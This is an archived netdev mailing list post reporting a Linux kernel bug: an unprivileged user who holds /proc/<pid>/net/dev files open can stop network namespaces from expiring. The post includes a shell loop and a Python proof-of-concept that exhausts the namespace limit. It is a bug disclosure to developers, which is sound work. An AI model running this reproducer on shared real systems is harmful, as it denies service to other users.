lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date:   Mon, 24 Aug 2020 23:49:24 +0200 (CEST)
From:   Arne Welzel <arne.welzel@...il.com>
To:     netdev@...r.kernel.org
Subject: Opening /proc/<pid>/net/dev prevents network namespace from
 expiring

Hello,

[reposting from kernelnewbies as suggested by Greg]

as an unprivileged user one is able to keep network namespaces from
expiring by opening /proc/<pid>/net/dev of other processes. I've previously
put this on stackexchange [1] and then bugzilla [2]. That's been a while
though, so posting here for a bit more visibility in case it's something
that's worth fixing.

The reproducer is roughly as follows. As root:

# echo "100" > /proc/sys/user/max_net_namespaces
# while true ; do
#     (unshare -n bash -c 'sleep 0.3 && readlink /proc/self/ns/net') || sleep 0.5
# done

As unprivileged user in a second terminal, run below Python script [3]:
# python3 pin_net_namespaces.py

After about one minute the first terminal will show the following until the
Python process keeping the network namespaces alive is terminated.
...
unshare: unshare failed: No space left on device
unshare: unshare failed: No space left on device

Without the change to max_net_namespaces reproducing just takes very long,
but then also kernel memory grows fairly large.

Does that seem like problematic behavior? I had attached a patch and tests
to [2], but I fall into the kernel newbie category, so not sure how useful.

Thanks,
   Arne


[1] https://unix.stackexchange.com/questions/576718/opening-proc-pid-net-dev-prevents-network-namespace-from-expiring-is-this-ex/
[2] https://bugzilla.kernel.org/show_bug.cgi?id=207351

[3] $ cat pin_net_namespaces.py
#!/usr/bin/env python3
import glob
import os
import time

net_namespaces = {}

while True:
    for net_dev in glob.glob("/proc/*/net/dev"):
        try:
            ino = os.stat(net_dev).st_ino
            if ino not in net_namespaces:
                net_namespaces[ino] = open(net_dev)
                print("Have", len(net_namespaces), "namespaces...")
        except FileNotFoundError:
            # not fast enough...
            pass

    time.sleep(0.2)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ